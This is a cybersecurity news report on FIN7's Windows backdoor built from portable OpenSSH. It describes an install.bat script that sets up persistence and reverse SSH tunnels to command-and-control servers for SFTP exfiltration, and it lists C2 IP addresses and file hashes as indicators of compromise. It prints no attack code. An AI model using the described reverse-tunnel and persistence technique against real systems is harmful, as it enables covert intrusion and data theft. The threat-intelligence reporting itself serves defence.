The financially motivated threat group FIN7, also tracked as Savage Ladybug, continues to rely on a Windows-specific SSH-based backdoor that has undergone only minor changes since its discovery in 2022.

Recent findings from Prodaft reveal that the group’s latest campaign again leverages a customized OpenSSH toolset and an installation script named install.bat to establish encrypted remote access channels and facilitate data exfiltration.

The toolset effectively turns Windows systems into SSH clients capable of initiating outbound reverse tunnels to attacker-controlled servers, thereby bypassing inbound firewall restrictions.

Once active, the malware enables secure SFTP sessions used for stealthy data transfer and continuous operator control. Researchers emphasize that the modular and legitimate appearance of the OpenSSH components makes detection challenging, as they mimic harmless administrative utilities.

Reverse Tunneling and Persistence Techniques

The attack chain begins with the deployment of a self-contained ZIP archive that bundles portable OpenSSH binaries, configuration files, and the batch installer script.

When executed, install.bat automatically extracts the package to an inconspicuous directory, typically within the Windows ProgramData or Temp folder. It then registers the service to ensure persistence through reboots by modifying system startup entries or scheduled tasks.

FIN7’s backdoor establishes a reverse SSH connection to predetermined command-and-control endpoints, encrypting traffic to disguise it as ordinary administrative activity.

This reverse connection model grants attackers full command-line access to infected hosts while allowing them to proxy communications through intermediate nodes.

Analysts note that the simplicity of the approach, using mature SSH utilities rather than custom binaries, reduces the operational footprint and limits forensic traces.

Indicators and Infrastructure

Prodaft’s technical analysis identified multiple active command-and-control IP addresses tied to Savage Ladybug’s latest wave of activity, including 193.233.205.55, 207.90.237.140, 166.88.159.175, and 5.181.159.118, among others.

The primary delivery infrastructure was traced to 194.87.39.183, hosting ZIP packages and configuration archives.

Associated file hashes include several variants of the installer and configuration sets, such as 6125dd568bad941f51594004a00da31d4a2120ce86ad54b18916c335df2e97db and a29bdd1745b827d672f1de43f3105bd3841d673cc27cc8737944eb1d1750db2b.

These artifacts align with the previously documented FIN7 intrusion toolkit, showing high consistency in operational methods across campaigns.

Security analysts assess that the continued use of this SSH-based backdoor underscores FIN7’s confidence in its stealth and persistence capabilities.

By embedding legitimate open-source components and relying on outbound encrypted connections, the group effectively evades conventional detection while maintaining durable access to compromised enterprise systems.

Indicators of Compromise (IOC)

C2 Servers

193.233.205.55
207.90.237.140
166.88.159.175
5.181.159.118
166.88.159.181

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post FIN7 Deploys Windows SSH Backdoor for Covert Remote Access and Long-Term Persistence appeared first on Cyber Security News.